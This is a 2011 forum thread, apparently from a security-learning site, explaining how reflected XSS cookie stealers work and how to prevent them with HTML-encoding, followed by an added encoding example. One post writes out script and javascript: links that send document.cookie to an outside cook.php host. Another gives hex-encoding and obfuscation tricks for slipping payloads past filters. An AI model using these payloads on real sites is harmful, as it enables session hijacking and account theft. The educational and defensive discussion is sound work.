[beginner] Non-Persistent XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat


Post by mutantsrus on Tue May 10, 2011 11:37 am

To understand how a cookie stealer works, first understand how a cookie works. A person can view their cookie, and theirs alone, by typing javascript:alert(document.cookie) in the address bar. Now if you can only view your cookie, then how could you go about stealing someone else's? You'd need that same JS to run on their computer right? Then you'd need it to be recorded and sent back to you. This is what a cookie stealer does, so in the end, it returns the cookie of anyone who falls prey to the trick.



Post by Reason7194 on Tue May 10, 2011 2:24 pm

The only part I don't understand is how a person 'links' a link to said forum but includes the javascript needed to grab the cookie. The person can't type into the chat box all of the js syntax, only the link.

-- Tue May 10, 2011 2:33 pm --

The same goes for adding the javascript to post like this one. I can't just put the Javascript here else the user would see it. Watch, I shall try -> <script language="Javascript">
document.location="http://justthink.frihost.org/cook.php?cookie=" + document.cookie;
</script>

<a href="javascript:document.location='http://justthink.frihost.org/cook.php?cookie='+document.cookie;">Click here to see if it actually worked!</a>

-- Tue May 10, 2011 2:34 pm --

See? The javascript appeared =/



Post by Goatboy on Tue May 10, 2011 4:10 pm

The reason people can type in JS is that the forum does not filter or encode the input properly. A good security practice is to either strip out characters that can be used in an attack ( < > ' " etc ) or, better yet, HTML-encode them to make them safe for showing. HTS does the latter.



Post by Dwere134 on Wed May 11, 2011 10:54 am

I am not sure if my question has been answered yet. Does the cookie stealer that Goatboy posted in the other thread steal EVERYONE'S cookies? Or just his target? Like if anyone clicked on it does goat have access to their cookies? Or is it just if the guy he was targeting clicks on it?



Post by Reason7194 on Wed May 11, 2011 12:36 pm

Then Goatboy, how did you write the javascript in your post?



Post by jgreen45 on Wed May 11, 2011 3:50 pm

Reason7194 wrote:Then Goatboy, how did you write the javascript in your post?


He didn't; the javascript was never executed on HTS. He just posted a simple link here with a search term that contained an encoded javascript redirect to a .js script on his website. The problem was at the victim's website: the coder decided to echo whatever was written into the search box onto his results page directly in the HTML, but he forgot to strip the bad characters, so the malicious search term was placed directly into the page.

When the browser parsed the page it saw the malicious search term and read it as javascript, which was then executed, and voila! Cookies galore.

On a side note, even if Goatboy did manage to execute JS code on HTS he would only be able to access the HTS cookies anyway; it's a safety mechanism built into the browser.
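The echo-the-search-term bug jgreen45 describes, beside the output HTML-encoding Goatboy recommends, as an added example that is not code from the thread or from HTS; the function names and the sample search term are ours.

```javascript
// Added example, not code from the thread or from HTS. Shows the search page
// bug described above (user input echoed straight into HTML) next to the fix
// (HTML-encode at output). All names here are ours.

// Encode the characters that let text escape an HTML text node or a quoted
// attribute value. The browser still displays them as-is, but no longer
// parses them as markup.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the search term is placed into the page verbatim, both in a
// text node and inside an attribute value.
function renderResultsVulnerable(term) {
  return `<h1>Results for: ${term}</h1>\n<input name="q" value="${term}">`;
}

// Fixed: the same template, but every piece of user data is encoded first.
function renderResultsSafe(term) {
  const t = htmlEncode(term);
  return `<h1>Results for: ${t}</h1>\n<input name="q" value="${t}">`;
}

// Crude indicator used by the demo: does the rendered page contain a
// <script> start tag? (For illustration only; a real regression test
// should parse the HTML rather than grep it.)
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: a term that closes the attribute and opens a script
// tag, the same shape as the reflected payload discussed in the thread.
const SAMPLE_TERM = '"><script>alert(document.cookie)</script>';

function demo() {
  return {
    vulnerable: hasScriptTag(renderResultsVulnerable(SAMPLE_TERM)), // true
    safe: hasScriptTag(renderResultsSafe(SAMPLE_TERM)),             // false
  };
}
```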



Post by mutantsrus on Sun May 22, 2011 5:46 pm

Reason7194 wrote:The only part I don't understand is how a person 'links' a link to said forum but includes the javascript needed to grab the cookie. The person can't type into the chat box all of the js syntax, only the link.


1. You can obfuscate the code with something like this:
http://www.pc-help.org/obscure.htm (might not work in most browsers anymore.)

2. You could also use hex in the url:
"><marquee>
can be written as
%22%3e%3c%6d%61%72%71%75%65%65%3e%74%65%73%74%a

3. HTML doesn't work on these forums, but works in many other places. (Thus making XSS/CSRF a possibility)